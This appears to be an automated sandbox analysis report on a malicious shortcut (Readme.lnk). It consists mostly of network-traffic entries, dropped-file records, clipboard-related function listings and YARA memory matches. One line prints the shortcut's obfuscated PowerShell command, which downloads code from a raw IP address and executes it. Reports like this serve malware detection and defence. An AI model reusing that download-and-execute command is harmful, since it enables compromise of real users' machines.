                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.126.53.17:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49852 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,19_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,19_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,26_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004D9C20 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,CloseClipboard,19_2_004D9C20
                      Source: 123123213123123321132.exe, 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_c280d094-a
                      Source: 123123213123123321132.exe, 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_fa56793a-c
                      Source: Yara matchFile source: 26.3.123123213123123321132.exe.2ed0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.fontdrvhost.exe.5800000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.123123213123123321132.exe.30f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.123123213123123321132.exe.2ed0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.123123213123123321132.exe.2ed0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.fontdrvhost.exe.5800000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.fontdrvhost.exe.55e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2121979217.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 123123213123123321132.exe PID: 7048, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6304, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeFile dump: DiskTuner.exe.19.dr 979567349Jump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeJump to dropped file
                      Source: Readme.lnk.download.lnkLNK file: /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000289EBE81AA4 NtAcceptConnectPort,NtAcceptConnectPort,31_2_00000289EBE81AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000289EBE81CF4 NtAcceptConnectPort,CloseHandle,31_2_00000289EBE81CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000289EBE80AC8 NtAcceptConnectPort,NtAcceptConnectPort,31_2_00000289EBE80AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000289EBE815C0 NtAcceptConnectPort,31_2_00000289EBE815C0
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B7E0EF25_2_00007FFD9B7E0EF2
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0040A02019_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0042D30019_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0043C3C019_2_0043C3C0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0042D39B19_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0042D4F919_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0041B4B019_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0042067019_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0041662119_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0045E87019_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0047DA0019_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0040ACD019_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_00464EE019_2_00464EE0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007A81D226_3_007A81D2
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_0079C23126_3_0079C231
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_0079C40026_3_0079C400
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0040A02026_2_0040A020
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0042D30026_2_0042D300
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0042D39B26_2_0042D39B
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_004033A126_2_004033A1
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0042D4F926_2_0042D4F9
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0041B4B026_2_0041B4B0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0042067026_2_00420670
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0041662126_2_00416621
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0045E87026_2_0045E870
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0047DA0026_2_0047DA00
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_0040ACD026_2_0040ACD0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00464EE026_2_00464EE0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 31_2_00000289EBE80C7031_2_00000289EBE80C70
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe D0F631F6269C14FE7622F4A1085F99E6BFD235942CE57715914EE4A319484A55
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe 6F2EB3AE312F322B8AAFC8EEFF1E402325D6E18A7D37DDA3A0FAD727845D19C8
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: String function: 00435140 appears 70 times
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: String function: 004C9120 appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: String function: 0079CD90 appears 33 times
